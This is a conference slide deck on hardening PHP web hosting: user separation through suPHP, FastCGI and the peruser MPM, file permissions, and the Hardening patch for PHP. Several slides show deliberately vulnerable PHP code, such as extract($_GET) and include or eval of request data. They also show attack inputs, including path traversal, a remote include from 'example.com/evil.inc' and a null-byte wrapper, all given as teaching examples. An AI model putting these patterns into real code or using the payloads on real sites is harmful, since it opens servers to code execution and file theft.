Secure PHP environment
Stefan Neufeind, SpeedPartner GmbH
Page 2: About me
- Stefan Neufeind
- From Neuss (near Düsseldorf, Germany)
- Working for SpeedPartner GmbH (consulting, development, administration)
- PEAR developer
- Loves PHP / FOSS :-)
Page 3: Agenda
- Basic steps, common beliefs
- Server environment
- Separating users
  - CGI
  - FastCGI
  - MPM („inside“ Apache)
- Delivering static files
- Hardening PHP
- Links
Page 4: Basic steps
- Physical security
  - Direct access to server / data possible?
- Network security
  - Connected to the Internet? Firewalled? Security monitored?
Page 5: Basic steps – Application security
- Base system
- Webserver
- PHP
- Web applications
- Other applications on the same server
- Any „unneeded“ services available?
Page 6: Basic steps – Application security (continued)
- Patches applied
- Configuration „carefully“ done
- Users / applications on the system
- Separation of rights / services
Page 7: Basic steps – Your personal „mix“ of:
- Performance
- Resources
- Security
- Ease of use
Page 8: Basic steps – Security lifecycle
- Requirements: identify needs / use-cases
- Design: define rules
- Implementation: apply rules
- Verification: monitor rules
- Continuing process of improvement; review critically
Page 9: Common beliefs
- “A standard installation is secure.”
  - Usually not (unless it does not expose any services etc.)
- “I have only secure applications installed.”
  - How can you be sure? Did you re-check this assumption lately? (security warnings, patches, audits, ...)
Page 10: Common beliefs
- “My users know what they are doing.”
  - What are they doing? Do they know and follow the rules?
- “None of the users would try to break anything.”
  - Somebody will always try out something. If even the smallest „holes“ exist, they might be found.
Page 11: Server environment
- Run minimal services (Apache, MySQL, ...)
- Expose only needed services to the net (Apache, ...)
- Firewalling
  - Also host-based
  - Rate-limiting, limit outgoing connections, ...
- Restrictive file/directory permissions
Page 12: Server environment – PHP
- Secure configuration (no register_globals, ...)
- Separate user-rights of scripts
- Use safety checks:
  - In application code
  - Inside PHP (Hardening patch for PHP → later)
Page 13: Separating users – Concepts
- PHP with safe_mode
  - Too restrictive for some scripts
  - Only “fake” separation of users
  - Does not work for other CGIs
- Running one instance for each user
- User-switching where needed
- User-switching where possible
Page 14: User-switching via CGI
Pros:
- „Easy” to use
- Stable
- (Quite) secure
Cons:
- Slow
- PHP also as CGI
- No switching for static content
Page 15: User-switching via CGI – Solutions
- mod_suexec (from Apache)
- suPHP
- mod_suid (only for Apache 1.x, old)
- mod_cgiwrap (only for Apache 1.x, officially discontinued)
Page 16: User-switching via CGI – suPHP
- Runs PHP scripts without #! in the first line
- Allows running php3/4/5 in parallel
- Special environment setup for PHP
- Also runs normal CGIs
Page 17: User-switching via CGI – suPHP, Apache configuration

```apache
AddHandler php5-script .php5
<Directory />
    AddHandler x-httpd-php .php
    suPHP_AddHandler x-httpd-php
    # optional:
    suPHP_UserGroup username groupname
</Directory>
suPHP_Engine on
```
Page 18: User-switching via CGI – suPHP, excerpts from /etc/suphp.conf

```ini
webserver_user=apache
;Path all scripts have to be in
docroot=/var/www
;Check whether script is within DOCUMENT_ROOT
check_vhost_docroot=true
;Umask to set, specify in octal notation
umask=0077
```
Page 19: User-switching via CGI – suPHP, excerpts from /etc/suphp.conf

```ini
; Security options
allow_file_group_writeable=false
allow_file_others_writeable=false
allow_directory_group_writeable=false
allow_directory_others_writeable=false
; Minimum UID/GID
min_uid=48
min_gid=48
```
Page 20: User-switching via CGI – suPHP, excerpts from /etc/suphp.conf

```ini
[handlers]
;Handler for php-scripts
x-httpd-php=php:/usr/bin/php-cgi
;Handler for CGI-scripts
x-suphp-cgi=execute:!self
```
Page 21: User-switching via FastCGI
Pros:
- Faster than CGI
- Stable
- Platform-independent
- Runnable remote from the webserver
Cons:
- Fixed number of instances per user
- Only for FastCGI-enabled programs (e.g. PHP)
- No switching for static content
Page 22: User-switching via FastCGI
- Instances of the FastCGI program keep running without being closed
  - Saves fork() etc. on every request
- Communication with the webserver uses domain sockets or TCP/IP instead of pipes
  - Allows running remote from the webserver
Page 23: User-switching via FastCGI – Apache configuration, global
- Instead of „-socket” use “-host” for remote connections via TCP/IP
- Colon in socket name due to a PHP bug

```apache
<IfModule mod_fastcgi.c>
    FastCgiExternalServer /var/run/php-fastcgi/fcgi-bin/demouser/php4 -socket /var/run/php-fastcgi/sockets/demouser:php4
</IfModule>
```
Page 24: User-switching via FastCGI – Apache configuration, virtualhost/directory
- Last argument to “ScriptAlias” is an identifier
- Identifier used for mapping internally (should exist in the filesystem for compatibility with Apache 1.x/2.x)

```apache
AddHandler php-cgi .php
Action php-cgi /cgi-bin/php4
ScriptAlias /cgi-bin/php4 /var/run/php-fastcgi/fcgi-bin/demouser/php4
```
Page 25: User-switching via FastCGI – Configuration via environment
- PHP_FCGI_CHILDREN: number of PHP children to spawn
- PHP_FCGI_MAX_REQUESTS: number of requests served by a single PHP process until it is restarted
Page 26: User-switching inside Apache
Pros:
- Faster than CGI
- Switches the Apache instance completely
- Also static content user-switched
Cons:
- Not recommended for production
- No official (working) Apache module
- Module must match the Apache version
Page 27: User-switching inside Apache – Solutions via MPM for Apache 2.x (MPM = Multi-Processing Module)
- perchild (from Apache)
  - Official statement: “module is not functional”
  - “Do not use unless [...] willing to help fix it.”
- MetuxMPM
  - Chaotic development; not up to date
- peruser (from Telena)
Page 28: User-switching inside Apache – Roots of implementations
- perchild (not functional)
  - MetuxMPM, based on perchild (not for current Apache)
    - peruser, based on MetuxMPM (a bit more advanced)
Page 29: User-switching inside Apache – peruser MPM
- Works for Apache 2.0.52; newer patches under development
- Used in production, but recommended „If it breaks, you get to keep both pieces :)”
- Problems with mod_ssl: use a proxy such as “Pound” in front
- Disable KeepAlive to avoid problems
Page 30–31: User-switching inside Apache – Apache configuration, global
- Use one “Processor” directive for each user/group/chroot combination needed

```apache
<IfModule peruser.c>
    ServerLimit 256
    MaxClients 256
    MinSpareProcessors 2
    MaxProcessors 10
    MaxRequestsPerChild 1000
    # kill idle procs after XX seconds
    ExpireTimeout 1800
    Multiplexer nobody nobody
    Processor user group /home/user
    # chroot dir is optional:
    # Processor user group
</IfModule>
# KeepAlive *MUST* be off
KeepAlive Off
```
Page 32: User-switching inside Apache – Apache configuration, virtualhost/directory

```apache
<IfModule peruser.c>
    # must match a defined Processor
    ServerEnvironment user group /home/user
    # optional
    MinSpareProcessors 4
    MaxProcessors 20
</IfModule>
```
Page 33: Delivering static files
- Separating users desired
  - No access to foreign files; not even for static files, not even read
- Works fine with a fully user-switched Apache (MPM)
- But how with user-switched CGI/FastCGI?
Page 34: Delivering static files – Possible solution
- Apache in all user groups
- Just read access for Apache
- Possibility to prevent access for Apache to specific files (configs, logs, PHP, ...)
- Linux 2.4: 32 groups per user; Linux 2.6: 65535 groups per user
Page 35: Delivering static files – Files for testing

```
-rw-r----- user1000 group1000 file1000.txt
-rw-r----- user1001 group1001 file1001.txt
-rw-r----- user1002 group1002 file1002.txt
-rw------- user1002 group1002 script1002.txt
```

Excerpt from /etc/group:

```
group1000:x:1000:apache
group1001:x:1001:apache
group1002:x:1002:apache
```
Page 36: Hardening PHP
- Former “Hardened-PHP”, now “Hardening patch for PHP”
- Adds extra checks, limitations and filters
- Backports some security improvements
Page 37: Hardening PHP – New checks/features for:
- Engine
- Runtime
- Filtering
- Logging
Page 38: Hardening PHP – Engine features
- Zend Memory Manager: canary and safe-unlink protection
- Zend Linked List: canary protection
- Zend HashTables: destructor canary protection
- Protection of the PHP core and extensions against format string vulnerabilities
Page 39: Hardening PHP – Runtime features
- Execution depth limit
- Separated function whitelists and blacklists in normal and in eval() mode
- Failing SQL queries within the MySQL/MySQLi/fbsql/pgsql/sqlite extensions can be logged
- Script can abort after a failed SQL query
Page 40: Hardening PHP – Runtime features (continued)
- Multiple HTTP headers in one header() call forbidden by default
- Include filename limits
- Overlong filename filter
- URL filter (optional whitelist/blacklist)
- Uploaded files filter
- Truncated filename filter
Page 41: Hardening PHP – Runtime features (continued)
- Superglobals protected against extract()/import_request_vars()
- memory_limit cannot be raised above the configured limit
- realpath() replacement function: prevents problems on some platforms (Linux, BSD, ...)
Page 42: Hardening PHP – Runtime: superglobals (example)
- Without superglobal protection, $_SERVER might have been overwritten.

```php
<?php
// ...
extract($_GET);
echo $_SERVER['DOCUMENT_ROOT'];
// ...
?>
```
Page 43: Hardening PHP – Runtime: path checking (example)
- Choose $nr = "15.txt/../../def"
- Actually reading /def.txt
- Hardened PHP would find out that /abc/artikel_15.txt is no directory

```php
<?php
// ...
$a = file_get_contents("/abc/artikel_$nr.txt");
echo $a;
?>
```
Page 44: Hardening PHP – Runtime configuration (php.ini, excerpt)
- hphp.executor.include.whitelist / blacklist: beginning of URL schemes to allow includes from (also php://stdin)
- hphp.executor.func.whitelist / blacklist
- hphp.executor.eval.whitelist / blacklist
Page 45: Hardening PHP – Runtime: include and eval (example)
- Arbitrary (remote?) includes: action=http://example.com/evil.inc, action=php://input%00
- Function calls via eval

```php
<?php
include $_GET['module'].'-module.php';
eval('module_'.$_GET['module'].'_init()');
?>
```
Page 46: Hardening PHP – Filtering features
- GET, POST and COOKIE variables with the following names are not registered: GLOBALS, _COOKIE, _ENV, _FILES, _GET, _POST, _REQUEST, _SERVER, _SESSION, HTTP_COOKIE_VARS, HTTP_ENV_VARS, HTTP_GET_VARS, HTTP_POST_FILES, HTTP_POST_VARS, HTTP_RAW_POST_DATA, HTTP_SERVER_VARS, HTTP_SESSION_VARS
Page 47: Hardening PHP – Filtering features (continued)
- Limits can be enforced on COOKIE, GET or POST variables or on all REQUEST vars:
  - Number of variables
  - Maximum length of variable name
  - Maximum length of array indices
  - Maximum length of variable value
  - Maximum depth of array
Page 48: Hardening PHP – Filtering features (continued)
- Allow/disallow %00 in user input
- Limit for number of uploadable files
- Hook for variable name checks before file upload
- Uploaded ELF files can be filtered
- External verification script for uploaded files
Page 49: Hardening PHP – Filtering features (examples)
- %00 (binary null) used to terminate strings
  - Can prevent some functions from checking beyond this artificial “end of string”
- Check filenames before they are passed to the script
  - Allows virus scans, rejecting certain files, ...
Page 50: Hardening PHP – Logging features
- Logging of ALERT classes configurable by class
- Syslog facility and priority configurable
- ALERTs loggable by SAPI error log
- ALERTs loggable by external script
- Attackers' IP addresses can be extracted from X-Forwarded-For headers
Page 51: Hardening PHP
Pros:
- „Paranoid“ checks
- Can prevent unknown exploits
- Additional security without touching scripts
Cons:
- Security vs. performance / resources
- Some rules might be “too restrictive” initially; adjust carefully where needed
Page 52: Links – CGI user-switching for Apache
- mod_suexec: http://httpd.apache.org/docs/2.0/mod/mod_suexec.html
- suPHP: http://www.suphp.org/
- mod_suid: http://www.palsenberg.com/index.php/plain/projects/
- mod_cgiwrap: http://mod-cgiwrap.sourceforge.net/
Page 53: Links – MPMs for Apache
- perchild (from Apache): http://httpd.apache.org/docs/2.0/mod/perchild.html
- MetuxMPM: official http://www.metux.de/mpm/, unofficial http://www.sannes.org/metuxmpm/
- peruser (from Telena): http://www.telana.com/peruser.php
Page 54: Links / Thanks
- FastCGI: http://www.fastcgi.com/
- Hardening patch for PHP: http://www.hardened-php.org/
- PHP Professionell (German magazine, article on hardening PHP)
- Thanks go to: Hilko Bengen (FastCGI), Stefan Esser (Hardened PHP)
Page 55: Thank you!
- Up-to-date slides available at: http://talks.speedpartner.de/
- Questions? neufeind (at) speedpartner.de